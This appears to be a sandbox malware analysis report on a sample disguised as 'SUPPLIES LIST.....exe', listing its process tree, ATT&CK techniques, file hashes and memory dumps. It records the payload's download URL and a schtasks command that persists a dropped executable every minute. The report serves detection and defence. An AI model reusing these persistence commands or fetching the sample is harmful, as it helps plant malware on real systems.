"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5340 /prefetch:8
3⤵
PID:1824

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 /prefetch:8
3⤵
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:3536

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x25c,0x260,0x264,0x21c,0x268,0x7ff68ff85460,0x7ff68ff85470,0x7ff68ff85480
4⤵
PID:4580

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6108 /prefetch:8
3⤵
PID:2080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
3⤵
PID:3076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
3⤵
PID:1292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
3⤵
PID:4716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2136,2743704176582709807,3592848142345587587,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
3⤵
PID:3028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://a.pomf.cat/hgfetb.R11
2⤵
PID:4416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa455146f8,0x7ffa45514708,0x7ffa45514718
3⤵
PID:2912

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3604

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3556

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\hgfetb (1).R11
2⤵
PID:2220

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5944

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6031:74:7zEvent17936
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6092

C:\Users\Admin\Downloads\SUPPLIES LIST.....exe
"C:\Users\Admin\Downloads\SUPPLIES LIST.....exe"
1⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:5140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn VZOMCK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\HFHVFU.exe /sc minute /mo 1
2⤵
PID:5176

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn VZOMCK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\HFHVFU.exe /sc minute /mo 1
3⤵
- Creates scheduled task(s)
PID:5496

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\VZOMCK.vbs
2⤵
PID:3596

C:\Users\Admin\Downloads\SUPPLIES LIST.....exe
"C:\Users\Admin\Downloads\SUPPLIES LIST.....exe"
1⤵
- Executes dropped EXE
PID:5124

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
471B

MD5
41f59e01c5c5c7b0761bd11241413751

SHA1
f65e1fa997ae98b987b81c6882189789c7f3095b

SHA256
5880eac3586b1c4df495e5cf1365fb406a1cedce1be5a354ff49a3e21e7b3747

SHA512
0a588557362ebe1c13ffb4f4267ae7133db0ca7f2d6b9031229b7c93e143492b332e799a6599ee63347ddefbff1f86b4f328099c8445a37bfb213c2a3333ec09

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
400B

MD5
86aeade5ebbf0523a3e47367bef6678a

SHA1
e9800fe9a0eac6634410f2cd83c3726c5a1ce81e

SHA256
73ba52e89bed2daf1d9a27f001ab9212eb764b053bf212824acd020f8b26ce6d

SHA512
adc17c36be3e1571107725a7e976b1aa10a238e47f002cf1cf75437f2f09b4c1be8f78dbf1fe897b347e9640a615b7cc3c480cfcb746fcdfdfd9f6e181b9fb46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
71b657795f1d63721f304fcf46915016

SHA1
d2cabf753a2b8888642a3a26878e7f47784153b2

SHA256
f6d95ff8ef0a6098a3c31bedf0f623555cf3855bab0142f2350f07eb85832c28

SHA512
dd1d8e6e56463cba11da14b604c4dcedf13e1914c4afab93121f6535a30120e0d907c0129c6eebfc8a0a70a557d2f6d467a24fe0bac960c79519049e1931ea20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
71b657795f1d63721f304fcf46915016

SHA1
d2cabf753a2b8888642a3a26878e7f47784153b2

SHA256
f6d95ff8ef0a6098a3c31bedf0f623555cf3855bab0142f2350f07eb85832c28

SHA512
dd1d8e6e56463cba11da14b604c4dcedf13e1914c4afab93121f6535a30120e0d907c0129c6eebfc8a0a70a557d2f6d467a24fe0bac960c79519049e1931ea20

Download Submit
C:\Users\Admin\AppData\Local\Temp\VZOMCK.vbs

Filesize
845B

MD5
6987c7fc339b389ce64c9d07448f528f

SHA1
7caae4ab0f2deee6a67e9237b43c5967bdc11d81

SHA256
e40c7a955ebdd256118aaaf5e0ae4a7f2324d9cdf747aaa4becf6e2a9dbc6ee3

SHA512
4b5c41a8d5c056a65568dd2d9bc263feb7256fc634009a0c2d1c56f3b1329b0538fe8485326a09a2c3a0784522943b35a01071d84359831f02e478499dc42f45

Download Submit
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe

Filesize
1.1MB

MD5
e98902e8b25c5fd9b076085b4ec07425

SHA1
da75f7df5c4dd88fa452857b27ad7608a1d960a7

SHA256
fc9bf2effffbbd12c39aa6da2c6e73f44fac91081a5db95b085dd0e1c8fe1a88

SHA512
076f73761ad22f655b29cde60f629e610aae4463f03415c1b9adbb6f8cb88c1e59ab76f5da048d92beb345e3536bb43a658e29db22a76b1a61ced0107e331ce2

Download Submit
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe

Filesize
1.1MB

MD5
e98902e8b25c5fd9b076085b4ec07425

SHA1
da75f7df5c4dd88fa452857b27ad7608a1d960a7

SHA256
fc9bf2effffbbd12c39aa6da2c6e73f44fac91081a5db95b085dd0e1c8fe1a88

SHA512
076f73761ad22f655b29cde60f629e610aae4463f03415c1b9adbb6f8cb88c1e59ab76f5da048d92beb345e3536bb43a658e29db22a76b1a61ced0107e331ce2

Download Submit
C:\Users\Admin\Downloads\SUPPLIES LIST.....exe

Filesize
1.1MB

MD5
e98902e8b25c5fd9b076085b4ec07425

SHA1
da75f7df5c4dd88fa452857b27ad7608a1d960a7

SHA256
fc9bf2effffbbd12c39aa6da2c6e73f44fac91081a5db95b085dd0e1c8fe1a88

SHA512
076f73761ad22f655b29cde60f629e610aae4463f03415c1b9adbb6f8cb88c1e59ab76f5da048d92beb345e3536bb43a658e29db22a76b1a61ced0107e331ce2

Download Submit
C:\Users\Admin\Downloads\hgfetb (1).R11

Filesize
813KB

MD5
26323ec2ddb6ed0211dcfcac34409697

SHA1
3fab9d3b6782d12e1ac723e83095918d934f90b8

SHA256
8fe2456322a912436f60adb6ca18f068c86a76004849fcaf03cb160158e50031

SHA512
fbf193195fa0bf7ffe7e4b3595e0e8d3cf6d1f6b9664a75c6dc666f3c2e813cdca0dae31879ab17ea27712fbd255c33536b002710f3539e241484c68c32f7832

Download Submit
C:\Users\Admin\Downloads\hgfetb.R11

Filesize
813KB

MD5
26323ec2ddb6ed0211dcfcac34409697

SHA1
3fab9d3b6782d12e1ac723e83095918d934f90b8

SHA256
8fe2456322a912436f60adb6ca18f068c86a76004849fcaf03cb160158e50031

SHA512
fbf193195fa0bf7ffe7e4b3595e0e8d3cf6d1f6b9664a75c6dc666f3c2e813cdca0dae31879ab17ea27712fbd255c33536b002710f3539e241484c68c32f7832

Download Submit
\??\pipe\LOCAL\crashpad_4908_BRLPFELUAMQRAQRN

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/536-168-0x0000000000000000-mapping.dmp

Download
memory/860-159-0x0000000000000000-mapping.dmp

Download
memory/1292-187-0x0000000000000000-mapping.dmp

Download
memory/1724-139-0x0000000000000000-mapping.dmp

Download
memory/1824-176-0x0000000000000000-mapping.dmp

Download
memory/2080-181-0x0000000000000000-mapping.dmp

Download
memory/2220-193-0x0000000000000000-mapping.dmp

Download
memory/2412-162-0x0000000000000000-mapping.dmp

Download
memory/2604-136-0x0000000000000000-mapping.dmp

Download
memory/2912-164-0x0000000000000000-mapping.dmp

Download
memory/2932-144-0x0000000000000000-mapping.dmp

Download
memory/2936-132-0x0000000000000000-mapping.dmp

Download
memory/3028-203-0x0000000000000000-mapping.dmp

Download
memory/3076-183-0x0000000000000000-mapping.dmp

Download
memory/3536-177-0x0000000000000000-mapping.dmp

Download
memory/3540-149-0x0000000000000000-mapping.dmp

Download
memory/3596-198-0x0000000000000000-mapping.dmp

Download
memory/4044-172-0x0000000000000000-mapping.dmp

Download
memory/4328-155-0x0000000000000000-mapping.dmp

Download
memory/4416-163-0x0000000000000000-mapping.dmp

Download
memory/4580-178-0x0000000000000000-mapping.dmp

Download
memory/4596-158-0x0000000000000000-mapping.dmp

Download
memory/4616-134-0x0000000000000000-mapping.dmp

Download
memory/4632-184-0x0000000000000000-mapping.dmp

Download
memory/4712-170-0x0000000000000000-mapping.dmp

Download
memory/4716-189-0x0000000000000000-mapping.dmp

Download
memory/4792-152-0x0000000000000000-mapping.dmp

Download
memory/4860-185-0x0000000000000000-mapping.dmp

Download
memory/4896-179-0x0000000000000000-mapping.dmp

Download
memory/4908-133-0x0000000000000000-mapping.dmp

Download
memory/4912-174-0x0000000000000000-mapping.dmp

Download
memory/5176-197-0x0000000000000000-mapping.dmp

Download
memory/5496-199-0x0000000000000000-mapping.dmp

Download